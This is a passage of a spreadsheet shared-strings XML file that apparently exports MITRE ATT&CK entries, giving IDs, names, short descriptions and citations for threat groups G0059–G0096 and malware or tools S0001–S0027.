    <t>[Magic Hound](https://attack.mitre.org/groups/G0059) is an Iranian-sponsored threat group operating primarily in the Middle East that dates back as early as 2014. The group behind the campaign has primarily targeted organizations in the energy, government, and technology sectors that are either based or have business interests in Saudi Arabia.(Citation: Unit 42 Magic Hound Feb 2017)(Citation: FireEye APT35 2018)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/groups/G0059</t>
  </si>
  <si>
    <t>G0060</t>
  </si>
  <si>
    <t>BRONZE BUTLER</t>
  </si>
  <si>
    <t>[BRONZE BUTLER](https://attack.mitre.org/groups/G0060) is a cyber espionage group with likely Chinese origins that has been active since at least 2008. The group primarily targets Japanese organizations, particularly those in government, biotechnology, electronics manufacturing, and industrial chemistry. (Citation: Trend Micro Daserf Nov 2017) (Citation: Secureworks BRONZE BUTLER Oct 2017)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/groups/G0060</t>
  </si>
  <si>
    <t>G0061</t>
  </si>
  <si>
    <t>FIN8</t>
  </si>
  <si>
    <t>[FIN8](https://attack.mitre.org/groups/G0061) is a financially motivated threat group known to launch tailored spearphishing campaigns targeting the retail, restaurant, and hospitality industries. (Citation: FireEye Obfuscation June 2017) (Citation: FireEye Fin8 May 2016)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/groups/G0061</t>
  </si>
  <si>
    <t>G0062</t>
  </si>
  <si>
    <t>TA459</t>
  </si>
  <si>
    <t>[TA459](https://attack.mitre.org/groups/G0062) is a threat group believed to operate out of China that has targeted countries including Russia, Belarus, Mongolia, and others. (Citation: Proofpoint TA459 April 2017)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/groups/G0062</t>
  </si>
  <si>
    <t>G0063</t>
  </si>
  <si>
    <t>BlackOasis</t>
  </si>
  <si>
    <t>[BlackOasis](https://attack.mitre.org/groups/G0063) is a Middle Eastern threat group that is believed to be a customer of Gamma Group. The group has shown interest in prominent figures in the United Nations, as well as opposition bloggers, activists, regional news correspondents, and think tanks. (Citation: Securelist BlackOasis Oct 2017) (Citation: Securelist APT Trends Q2 2017) A group known by Microsoft as [NEODYMIUM](https://attack.mitre.org/groups/G0055) is reportedly associated closely with [BlackOasis](https://attack.mitre.org/groups/G0063) operations, but evidence that the group names are aliases has not been identified. (Citation: CyberScoop BlackOasis Oct 2017)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/groups/G0063</t>
  </si>
  <si>
    <t>G0064</t>
  </si>
  <si>
    <t>APT33</t>
  </si>
  <si>
    <t>[APT33](https://attack.mitre.org/groups/G0064) is a suspected Iranian threat group that has carried out operations since at least 2013. The group has targeted organizations across multiple industries in the United States, Saudi Arabia, and South Korea, with a particular interest in the aviation and energy sectors. (Citation: FireEye APT33 Sept 2017) (Citation: FireEye APT33 Webinar Sept 2017)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/groups/G0064</t>
  </si>
  <si>
    <t>G0065</t>
  </si>
  <si>
    <t>Leviathan</t>
  </si>
  <si>
    <t>[Leviathan](https://attack.mitre.org/groups/G0065) is a cyber espionage group that has been active since at least 2013. The group generally targets defense and government organizations, but has also targeted a range of industries including engineering firms, shipping and transportation, manufacturing, defense, government offices, and research universities in the United States, Western Europe, and along the South China Sea. (Citation: Proofpoint Leviathan Oct 2017) (Citation: FireEye Periscope March 2018)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/groups/G0065</t>
  </si>
  <si>
    <t>G0066</t>
  </si>
  <si>
    <t>Elderwood</t>
  </si>
  <si>
    <t>[Elderwood](https://attack.mitre.org/groups/G0066) is a suspected Chinese cyber espionage group that was reportedly responsible for the 2009 Google intrusion known as Operation Aurora. (Citation: Security Affairs Elderwood Sept 2012) The group has targeted defense organizations, supply chain manufacturers, human rights and nongovernmental organizations (NGOs), and IT service providers. (Citation: Symantec Elderwood Sept 2012) (Citation: CSM Elderwood Sept 2012)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/groups/G0066</t>
  </si>
  <si>
    <t>G0067</t>
  </si>
  <si>
    <t>APT37</t>
  </si>
  <si>
    <t>[APT37](https://attack.mitre.org/groups/G0067) is a suspected North Korean cyber espionage group that has been active since at least 2012. The group has targeted victims primarily in South Korea, but also in Japan, Vietnam, Russia, Nepal, China, India, Romania, Kuwait, and other parts of the Middle East. [APT37](https://attack.mitre.org/groups/G0067) has also been linked to following campaigns between 2016-2018: Operation Daybreak, Operation Erebus, Golden Time, Evil New Year, Are you Happy?, FreeMilk, Northern Korean Human Rights, and Evil New Year 2018. (Citation: FireEye APT37 Feb 2018) (Citation: Securelist ScarCruft Jun 2016) (Citation: Talos Group123)
North Korean group definitions are known to have significant overlap, and the name [Lazarus Group](https://attack.mitre.org/groups/G0032) is known to encompass a broad range of activity. Some organizations use the name Lazarus Group to refer to any activity attributed to North Korea.(Citation: US-CERT HIDDEN COBRA June 2017) Some organizations track North Korean clusters or groups such as Bluenoroff,(Citation: Kaspersky Lazarus Under The Hood Blog 2017) [APT37](https://attack.mitre.org/groups/G0067), and [APT38](https://attack.mitre.org/groups/G0082) separately, while other organizations may track some activity associated with those group names by the name Lazarus Group.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/groups/G0067</t>
  </si>
  <si>
    <t>G0068</t>
  </si>
  <si>
    <t>PLATINUM</t>
  </si>
  <si>
    <t>[PLATINUM](https://attack.mitre.org/groups/G0068) is an activity group that has targeted victims since at least 2009. The group has focused on targets associated with governments and related organizations in South and Southeast Asia. (Citation: Microsoft PLATINUM April 2016)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/groups/G0068</t>
  </si>
  <si>
    <t>G0069</t>
  </si>
  <si>
    <t>MuddyWater</t>
  </si>
  <si>
    <t>[MuddyWater](https://attack.mitre.org/groups/G0069) is an Iranian threat group that has primarily targeted Middle Eastern nations, and has also targeted European and North American nations. The group's victims are mainly in the telecommunications, government (IT services), and oil sectors. Activity from this group was previously linked to [FIN7](https://attack.mitre.org/groups/G0046), but the group is believed to be a distinct group possibly motivated by espionage.(Citation: Unit 42 MuddyWater Nov 2017)(Citation: Symantec MuddyWater Dec 2018)(Citation: ClearSky MuddyWater Nov 2018)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/groups/G0069</t>
  </si>
  <si>
    <t>G0070</t>
  </si>
  <si>
    <t>Dark Caracal</t>
  </si>
  <si>
    <t>[Dark Caracal](https://attack.mitre.org/groups/G0070) is threat group that has been attributed to the Lebanese General Directorate of General Security (GDGS) and has operated since at least 2012. (Citation: Lookout Dark Caracal Jan 2018)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/groups/G0070</t>
  </si>
  <si>
    <t>G0071</t>
  </si>
  <si>
    <t>Orangeworm</t>
  </si>
  <si>
    <t>[Orangeworm](https://attack.mitre.org/groups/G0071) is a group that has targeted organizations in the healthcare sector in the United States, Europe, and Asia since at least 2015, likely for the purpose of corporate espionage. (Citation: Symantec Orangeworm April 2018)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/groups/G0071</t>
  </si>
  <si>
    <t>G0072</t>
  </si>
  <si>
    <t>Honeybee</t>
  </si>
  <si>
    <t>[Honeybee](https://attack.mitre.org/groups/G0072) is a campaign led by an unknown actor that targets humanitarian aid organizations and has been active in Vietnam, Singapore, Argentina, Japans, Indonesia, and Canada. It has been an active operation since August of 2017 and as recently as February 2018. (Citation: McAfee Honeybee)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/groups/G0072</t>
  </si>
  <si>
    <t>G0073</t>
  </si>
  <si>
    <t>APT19</t>
  </si>
  <si>
    <t>[APT19](https://attack.mitre.org/groups/G0073) is a Chinese-based threat group that has targeted a variety of industries, including defense, finance, energy, pharmaceutical, telecommunications, high tech, education, manufacturing, and legal services. In 2017, a phishing campaign was used to target seven law and investment firms. (Citation: FireEye APT19) Some analysts track [APT19](https://attack.mitre.org/groups/G0073) and [Deep Panda](https://attack.mitre.org/groups/G0009) as the same group, but it is unclear from open source information if the groups are the same. (Citation: ICIT China's Espionage Jul 2016) (Citation: FireEye APT Groups) (Citation: Unit 42 C0d0so0 Jan 2016)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/groups/G0073</t>
  </si>
  <si>
    <t>G0074</t>
  </si>
  <si>
    <t>Dragonfly 2.0</t>
  </si>
  <si>
    <t>[Dragonfly 2.0](https://attack.mitre.org/groups/G0074) is a suspected Russian group that has targeted government entities and multiple U.S. critical infrastructure sectors since at least March 2016. (Citation: US-CERT TA18-074A) (Citation: Symantec Dragonfly Sept 2017) There is debate over the extent of overlap between [Dragonfly 2.0](https://attack.mitre.org/groups/G0074) and [Dragonfly](https://attack.mitre.org/groups/G0035), but there is sufficient evidence to lead to these being tracked as two separate groups. (Citation: Fortune Dragonfly 2.0 Sept 2017)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/groups/G0074</t>
  </si>
  <si>
    <t>G0075</t>
  </si>
  <si>
    <t>Rancor</t>
  </si>
  <si>
    <t>[Rancor](https://attack.mitre.org/groups/G0075) is a threat group that has led targeted campaigns against the South East Asia region. [Rancor](https://attack.mitre.org/groups/G0075) uses politically-motivated lures to entice victims to open malicious documents. (Citation: Rancor Unit42 June 2018)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/groups/G0075</t>
  </si>
  <si>
    <t>G0076</t>
  </si>
  <si>
    <t>Thrip</t>
  </si>
  <si>
    <t>[Thrip](https://attack.mitre.org/groups/G0076) is an espionage group that has targeted satellite communications, telecoms, and defense contractor companies in the U.S. and Southeast Asia. The group uses custom malware as well as "living off the land" techniques. (Citation: Symantec Thrip June 2018)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/groups/G0076</t>
  </si>
  <si>
    <t>G0077</t>
  </si>
  <si>
    <t>Leafminer</t>
  </si>
  <si>
    <t>[Leafminer](https://attack.mitre.org/groups/G0077) is an Iranian threat group that has targeted government organizations and business entities in the Middle East since at least early 2017. (Citation: Symantec Leafminer July 2018)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/groups/G0077</t>
  </si>
  <si>
    <t>G0078</t>
  </si>
  <si>
    <t>Gorgon Group</t>
  </si>
  <si>
    <t>[Gorgon Group](https://attack.mitre.org/groups/G0078)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 (Citation: Unit 42 Gorgon Group Aug 2018)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/groups/G0078</t>
  </si>
  <si>
    <t>G0079</t>
  </si>
  <si>
    <t>DarkHydrus</t>
  </si>
  <si>
    <t>[DarkHydrus](https://attack.mitre.org/groups/G0079) is a threat group that has targeted government agencies and educational institutions in the Middle East since at least 2016. The group heavily leverages open-source tools and custom payloads for carrying out attacks. (Citation: Unit 42 DarkHydrus July 2018) (Citation: Unit 42 Playbook Dec 2017)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/groups/G0079</t>
  </si>
  <si>
    <t>G0080</t>
  </si>
  <si>
    <t>Cobalt Group</t>
  </si>
  <si>
    <t>[Cobalt Group](https://attack.mitre.org/groups/G0080) is a financially motivated threat group that has primarily targeted financial institutions. The group has conducted intrusions to steal money via targeting ATM systems, card processing, payment systems and SWIFT systems. [Cobalt Group](https://attack.mitre.org/groups/G0080) has mainly targeted banks in Eastern Europe, Central Asia, and Southeast Asia. One of the alleged leaders was arrested in Spain in early 2018, but the group still appears to be active. The group has been known to target organizations in order to use their access to then compromise additional victims. (Citation: Talos Cobalt Group July 2018) (Citation: PTSecurity Cobalt Group Aug 2017) (Citation: PTSecurity Cobalt Dec 2016) (Citation: Group IB Cobalt Aug 2017) (Citation: Proofpoint Cobalt June 2017) (Citation: RiskIQ Cobalt Nov 2017) (Citation: RiskIQ Cobalt Jan 2018) Reporting indicates there may be links between [Cobalt Group](https://attack.mitre.org/groups/G0080) and both the malware [Carbanak](https://attack.mitre.org/software/S0030) and the group [Carbanak](https://attack.mitre.org/groups/G0008). (Citation: Europol Cobalt Mar 2018)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/groups/G0080</t>
  </si>
  <si>
    <t>G0081</t>
  </si>
  <si>
    <t>Tropic Trooper</t>
  </si>
  <si>
    <t>[Tropic Trooper](https://attack.mitre.org/groups/G0081) is an unaffiliated threat group that has led targeted campaigns against targets in Taiwan, the Philippines, and Hong Kong. [Tropic Trooper](https://attack.mitre.org/groups/G0081) focuses on targeting government, healthcare, transportation, and high-tech industries and has been active since 2011.(Citation: TrendMicro Tropic Trooper Mar 2018)(Citation: Unit 42 Tropic Trooper Nov 2016)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/groups/G0081</t>
  </si>
  <si>
    <t>G0082</t>
  </si>
  <si>
    <t>APT38</t>
  </si>
  <si>
    <t>[APT38](https://attack.mitre.org/groups/G0082) is a financially-motivated threat group that is backed by the North Korean regime. The group mainly targets banks and financial institutions and has targeted more than 16 organizations in at least 13 countries since at least 2014.(Citation: FireEye APT38 Oct 2018)
North Korean group definitions are known to have significant overlap, and the name [Lazarus Group](https://attack.mitre.org/groups/G0032) is known to encompass a broad range of activity. Some organizations use the name Lazarus Group to refer to any activity attributed to North Korea.(Citation: US-CERT HIDDEN COBRA June 2017) Some organizations track North Korean clusters or groups such as Bluenoroff,(Citation: Kaspersky Lazarus Under The Hood Blog 2017) [APT37](https://attack.mitre.org/groups/G0067), and [APT38](https://attack.mitre.org/groups/G0082) separately, while other organizations may track some activity associated with those group names by the name Lazarus Group.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/groups/G0082</t>
  </si>
  <si>
    <t>G0083</t>
  </si>
  <si>
    <t>SilverTerrier</t>
  </si>
  <si>
    <t>[SilverTerrier](https://attack.mitre.org/groups/G0083) is a Nigerian threat group that has been seen active since 2014. [SilverTerrier](https://attack.mitre.org/groups/G0083) mainly targets organizations in high technology, higher education, and manufacturing.(Citation: Unit42 SilverTerrier 2018)(Citation: Unit42 SilverTerrier 2016)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/groups/G0083</t>
  </si>
  <si>
    <t>G0084</t>
  </si>
  <si>
    <t>Gallmaker</t>
  </si>
  <si>
    <t>[Gallmaker](https://attack.mitre.org/groups/G0084) is a cyberespionage group that has targeted victims in the Middle East and has been active since at least December 2017. The group has mainly targeted victims in the defense, military, and government sectors.(Citation: Symantec Gallmaker Oct 2018)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/groups/G0084</t>
  </si>
  <si>
    <t>G0085</t>
  </si>
  <si>
    <t>FIN4</t>
  </si>
  <si>
    <t>[FIN4](https://attack.mitre.org/groups/G0085) is a financially-motivated threat group that has targeted confidential information related to the public financial market, particularly regarding healthcare and pharmaceutical companies, since at least 2013.(Citation: FireEye Hacking FIN4 Dec 2014)(Citation: FireEye FIN4 Stealing Insider NOV 2014) [FIN4](https://attack.mitre.org/groups/G0085) is unique in that they do not infect victims with typical persistent malware, but rather they focus on capturing credentials authorized to access email and other non-public correspondence.(Citation: FireEye Hacking FIN4 Dec 2014)(Citation: FireEye Hacking FIN4 Video Dec 2014)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/groups/G0085</t>
  </si>
  <si>
    <t>G0086</t>
  </si>
  <si>
    <t>Stolen Pencil</t>
  </si>
  <si>
    <t>[Stolen Pencil](https://attack.mitre.org/groups/G0086) is a threat group likely originating from DPRK that has been active since at least May 2018. The group appears to have targeted academic institutions, but its motives remain unclear.(Citation: Netscout Stolen Pencil Dec 2018)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/groups/G0086</t>
  </si>
  <si>
    <t>G0087</t>
  </si>
  <si>
    <t>APT39</t>
  </si>
  <si>
    <t>[APT39](https://attack.mitre.org/groups/G0087) is an Iranian cyber espionage group that has been active since at least 2014. They have targeted the telecommunication and travel industries to collect personal information that aligns with Iran's national priorities. (Citation: FireEye APT39 Jan 2019)(Citation: Symantec Chafer Dec 2015)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/groups/G0087</t>
  </si>
  <si>
    <t>G0088</t>
  </si>
  <si>
    <t>TEMP.Veles</t>
  </si>
  <si>
    <t>[TEMP.Veles](https://attack.mitre.org/groups/G0088) is a Russia-based threat group that has targeted critical infrastructure. The group has been observed utilizing TRITON, a malware framework designed to manipulate industrial safety systems.(Citation: FireEye TRITON 2019)(Citation: FireEye TEMP.Veles 2018)(Citation: FireEye TEMP.Veles JSON April 2019)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/groups/G0088</t>
  </si>
  <si>
    <t>G0089</t>
  </si>
  <si>
    <t>The White Company</t>
  </si>
  <si>
    <t>[The White Company](https://attack.mitre.org/groups/G0089) is a likely state-sponsored threat actor with advanced capabilities. From 2017 through 2018, the group led an espionage campaign called Operation Shaheen targeting government and military organizations in Pakistan.(Citation: Cylance Shaheen Nov 2018)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/groups/G0089</t>
  </si>
  <si>
    <t>G0090</t>
  </si>
  <si>
    <t>WIRTE</t>
  </si>
  <si>
    <t>[WIRTE](https://attack.mitre.org/groups/G0090) is a threat group that has been active since at least August 2018. The group focuses on targeting Middle East defense and diplomats.(Citation: Lab52 WIRTE Apr 2019)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/groups/G0090</t>
  </si>
  <si>
    <t>G0091</t>
  </si>
  <si>
    <t>Silence</t>
  </si>
  <si>
    <t xml:space="preserve">[Silence](https://attack.mitre.org/groups/G0091)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 (Citation: Cyber Forensicator Silence Jan 2019)(Citation: SecureList Silence Nov 2017) </t>
  </si>
  <si>
    <t>https://attack.mitre.org/groups/G0091</t>
  </si>
  <si>
    <t>G0092</t>
  </si>
  <si>
    <t>TA505</t>
  </si>
  <si>
    <t>[TA505](https://attack.mitre.org/groups/G0092) is a financially motivated threat group that has been active since at least 2014. The group is known for frequently changing malware and driving global trends in criminal malware distribution.(Citation: Proofpoint TA505 Sep 2017)(Citation: Proofpoint TA505 June 2018)(Citation: Proofpoint TA505 Jan 2019)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/groups/G0092</t>
  </si>
  <si>
    <t>G0093</t>
  </si>
  <si>
    <t>Soft Cell</t>
  </si>
  <si>
    <t>Operation [Soft Cell](https://attack.mitre.org/groups/G0093) is a group that is reportedly affiliated with China and is likely state-sponsored. The group has operated since at least 2012 and has compromised high-profile telecommunications networks.(Citation: Cybereason Soft Cell June 2019)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/groups/G0093</t>
  </si>
  <si>
    <t>G0094</t>
  </si>
  <si>
    <t>Kimsuky</t>
  </si>
  <si>
    <t>[Kimsuky](https://attack.mitre.org/groups/G0094) is a North Korean-based threat group that has been active since at least September 2013. The group focuses on targeting Korean think tank as well as DPRK/nuclear-related targets. The group was attributed as the actor behind the Korea Hydro &amp; Nuclear Power Co. compromise.(Citation: EST Kimsuky April 2019)(Citation: BRI Kimsuky April 2019)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/groups/G0094</t>
  </si>
  <si>
    <t>G0095</t>
  </si>
  <si>
    <t>Machete</t>
  </si>
  <si>
    <t>[Machete](https://attack.mitre.org/groups/G0095) is a group that has been active since at least 2010, targeting high-profile government entities in Latin American countries.(Citation: Cylance Machete Mar 2017)(Citation: Securelist Machete Aug 2014)(Citation: ESET Machete July 2019)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/groups/G0095</t>
  </si>
  <si>
    <t>G0096</t>
  </si>
  <si>
    <t>APT41</t>
  </si>
  <si>
    <t>[APT41](https://attack.mitre.org/groups/G0096) is a group that carries out Chinese state-sponsored espionage activity in addition to financially motivated activity. [APT41](https://attack.mitre.org/groups/G0096) has been active since as early as 2012. The group has been observed targeting healthcare, telecom, technology, and video game industries in 14 countries.(Citation: FireEye APT41 Aug 2019)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/groups/G0096</t>
  </si>
  <si>
    <t>S0001</t>
  </si>
  <si>
    <t>Software</t>
  </si>
  <si>
    <t>Trojan.Mebromi</t>
  </si>
  <si>
    <t>[Trojan.Mebromi](https://attack.mitre.org/software/S0001) is BIOS-level malware that takes control of the victim before MBR. (Citation: Ge 2011)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0001</t>
  </si>
  <si>
    <t>S0002</t>
  </si>
  <si>
    <t>Mimikatz</t>
  </si>
  <si>
    <t>[Mimikatz](https://attack.mitre.org/software/S0002) is a credential dumper capable of obtaining plaintext Windows account logins and passwords, along with many other features that make it useful for testing the security of networks. (Citation: Deply Mimikatz) (Citation: Adsecurity Mimikatz Guide)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0002</t>
  </si>
  <si>
    <t>S0003</t>
  </si>
  <si>
    <t>RIPTIDE</t>
  </si>
  <si>
    <t>[RIPTIDE](https://attack.mitre.org/software/S0003) is a proxy-aware backdoor used by [APT12](https://attack.mitre.org/groups/G0005). (Citation: Moran 2014)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0003</t>
  </si>
  <si>
    <t>S0004</t>
  </si>
  <si>
    <t>TinyZBot</t>
  </si>
  <si>
    <t>[TinyZBot](https://attack.mitre.org/software/S0004) is a bot written in C# that was developed by [Cleaver](https://attack.mitre.org/groups/G0003). (Citation: Cylance Cleaver)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0004</t>
  </si>
  <si>
    <t>S0005</t>
  </si>
  <si>
    <t>Windows Credential Editor</t>
  </si>
  <si>
    <t>[Windows Credential Editor](https://attack.mitre.org/software/S0005) is a password dumping tool. (Citation: Amplia WCE)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0005</t>
  </si>
  <si>
    <t>S0006</t>
  </si>
  <si>
    <t>pwdump</t>
  </si>
  <si>
    <t>[pwdump](https://attack.mitre.org/software/S0006) is a credential dumper. (Citation: Wikipedia pwdump)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0006</t>
  </si>
  <si>
    <t>S0007</t>
  </si>
  <si>
    <t>Skeleton Key</t>
  </si>
  <si>
    <t>[Skeleton Key](https://attack.mitre.org/software/S0007) is malware used to inject false credentials into domain controllers with the intent of creating a backdoor password. (Citation: Dell Skeleton) Functionality similar to [Skeleton Key](https://attack.mitre.org/software/S0007) is included as a module in [Mimikatz](https://attack.mitre.org/software/S0002).</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0007</t>
  </si>
  <si>
    <t>S0008</t>
  </si>
  <si>
    <t>gsecdump</t>
  </si>
  <si>
    <t>[gsecdump](https://attack.mitre.org/software/S0008) is a publicly-available credential dumper used to obtain password hashes and LSA secrets from Windows operating systems. (Citation: TrueSec Gsecdump)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0008</t>
  </si>
  <si>
    <t>S0009</t>
  </si>
  <si>
    <t>Hikit</t>
  </si>
  <si>
    <t>[Hikit](https://attack.mitre.org/software/S0009) is malware that has been used by [Axiom](https://attack.mitre.org/groups/G0001) for late-stage persistence and exfiltration after the initial compromise. (Citation: Novetta-Axiom)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0009</t>
  </si>
  <si>
    <t>S0010</t>
  </si>
  <si>
    <t>Lurid</t>
  </si>
  <si>
    <t>[Lurid](https://attack.mitre.org/software/S0010) is a malware family that has been used by several groups, including [PittyTiger](https://attack.mitre.org/groups/G0011), in targeted attacks as far back as 2006. (Citation: Villeneuve 2014) (Citation: Villeneuve 2011)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0010</t>
  </si>
  <si>
    <t>S0011</t>
  </si>
  <si>
    <t>[Taidoor](https://attack.mitre.org/software/S0011) is malware that has been used since at least 2010, primarily to target Taiwanese government organizations. (Citation: TrendMicro Taidoor)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0011</t>
  </si>
  <si>
    <t>S0012</t>
  </si>
  <si>
    <t>PoisonIvy</t>
  </si>
  <si>
    <t>[PoisonIvy](https://attack.mitre.org/software/S0012) is a popular remote access tool (RAT) that has been used by many groups. (Citation: FireEye Poison Ivy) (Citation: Symantec Elderwood Sept 2012) (Citation: Symantec Darkmoon Aug 2005)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0012</t>
  </si>
  <si>
    <t>S0013</t>
  </si>
  <si>
    <t>PlugX</t>
  </si>
  <si>
    <t>[PlugX](https://attack.mitre.org/software/S0013) is a remote access tool (RAT) that uses modular plugins. It has been used by multiple threat groups. (Citation: Lastline PlugX Analysis) (Citation: FireEye Clandestine Fox Part 2) (Citation: New DragonOK) (Citation: Dell TG-3390)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0013</t>
  </si>
  <si>
    <t>S0014</t>
  </si>
  <si>
    <t>BS2005</t>
  </si>
  <si>
    <t>[BS2005](https://attack.mitre.org/software/S0014) is malware that was used by [Ke3chang](https://attack.mitre.org/groups/G0004) in spearphishing campaigns since at least 2011. (Citation: Villeneuve et al 2014)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0014</t>
  </si>
  <si>
    <t>S0015</t>
  </si>
  <si>
    <t>Ixeshe</t>
  </si>
  <si>
    <t>[Ixeshe](https://attack.mitre.org/software/S0015) is a malware family that has been used since at least 2009 against targets in East Asia. (Citation: Moran 2013)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0015</t>
  </si>
  <si>
    <t>S0016</t>
  </si>
  <si>
    <t>P2P ZeuS</t>
  </si>
  <si>
    <t>[P2P ZeuS](https://attack.mitre.org/software/S0016) is a closed-source fork of the leaked version of the ZeuS botnet. It presents improvements over the leaked version, including a peer-to-peer architecture. (Citation: Dell P2P ZeuS)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0016</t>
  </si>
  <si>
    <t>S0017</t>
  </si>
  <si>
    <t>BISCUIT</t>
  </si>
  <si>
    <t>[BISCUIT](https://attack.mitre.org/software/S0017) is a backdoor that has been used by [APT1](https://attack.mitre.org/groups/G0006) since as early as 2007. (Citation: Mandiant APT1)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0017</t>
  </si>
  <si>
    <t>S0018</t>
  </si>
  <si>
    <t>Sykipot</t>
  </si>
  <si>
    <t>[Sykipot](https://attack.mitre.org/software/S0018) is malware that has been used in spearphishing campaigns since approximately 2007 against victims primarily in the US. One variant of [Sykipot](https://attack.mitre.org/software/S0018) hijacks smart cards on victims. (Citation: Alienvault Sykipot DOD Smart Cards) The group using this malware has also been referred to as Sykipot. (Citation: Blasco 2013)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0018</t>
  </si>
  <si>
    <t>S0019</t>
  </si>
  <si>
    <t>Regin</t>
  </si>
  <si>
    <t>[Regin](https://attack.mitre.org/software/S0019) is a malware platform that has targeted victims in a range of industries, including telecom, government, and financial institutions. Some [Regin](https://attack.mitre.org/software/S0019) timestamps date back to 2003. (Citation: Kaspersky Regin)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0019</t>
  </si>
  <si>
    <t>S0020</t>
  </si>
  <si>
    <t>China Chopper</t>
  </si>
  <si>
    <t>[China Chopper](https://attack.mitre.org/software/S0020) is a [Web Shell](https://attack.mitre.org/techniques/T1100) hosted on Web servers to provide access back into an enterprise network that does not rely on an infected system calling back to a remote command and control server. (Citation: Lee 2013) It has been used by several threat groups. (Citation: Dell TG-3390) (Citation: FireEye Periscope March 2018)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0020</t>
  </si>
  <si>
    <t>S0021</t>
  </si>
  <si>
    <t>Derusbi</t>
  </si>
  <si>
    <t>[Derusbi](https://attack.mitre.org/software/S0021) is malware used by multiple Chinese APT groups. (Citation: Novetta-Axiom) (Citation: ThreatConnect Anthem) Both Windows and Linux variants have been observed. (Citation: Fidelis Turbo)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0021</t>
  </si>
  <si>
    <t>S0022</t>
  </si>
  <si>
    <t>Uroburos</t>
  </si>
  <si>
    <t>[Uroburos](https://attack.mitre.org/software/S0022) is a rootkit used by [Turla](https://attack.mitre.org/groups/G0010). (Citation: Kaspersky Turla)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0022</t>
  </si>
  <si>
    <t>S0023</t>
  </si>
  <si>
    <t>CHOPSTICK</t>
  </si>
  <si>
    <t>[CHOPSTICK](https://attack.mitre.org/software/S0023) is a malware family of modular backdoors used by [APT28](https://attack.mitre.org/groups/G0007). It has been used since at least 2012 and is usually dropped on victims as second-stage malware, though it has been used as first-stage malware in several cases. It has both Windows and Linux variants. (Citation: FireEye APT28) (Citation: ESET Sednit Part 2) (Citation: FireEye APT28 January 2017) (Citation: DOJ GRU Indictment Jul 2018) It is tracked separately from the [X-Agent for Android](https://attack.mitre.org/software/S0314).</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0023</t>
  </si>
  <si>
    <t>S0024</t>
  </si>
  <si>
    <t>Dyre</t>
  </si>
  <si>
    <t>[Dyre](https://attack.mitre.org/software/S0024) is a Trojan that has been used for financial gain. 
 (Citation: Symantec Dyre June 2015)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0024</t>
  </si>
  <si>
    <t>S0025</t>
  </si>
  <si>
    <t>CALENDAR</t>
  </si>
  <si>
    <t>[CALENDAR](https://attack.mitre.org/software/S0025) is malware used by [APT1](https://attack.mitre.org/groups/G0006) that mimics legitimate Gmail Calendar traffic. (Citation: Mandiant APT1)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0025</t>
  </si>
  <si>
    <t>S0026</t>
  </si>
  <si>
    <t>GLOOXMAIL</t>
  </si>
  <si>
    <t>[GLOOXMAIL](https://attack.mitre.org/software/S0026) is malware used by [APT1](https://attack.mitre.org/groups/G0006) that mimics legitimate Jabber/XMPP traffic. (Citation: Mandiant APT1)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0026</t>
  </si>
  <si>
    <t>S0027</t>
  </si>
  <si>
    <t>Zeroaccess</t>
  </si>
  <si>
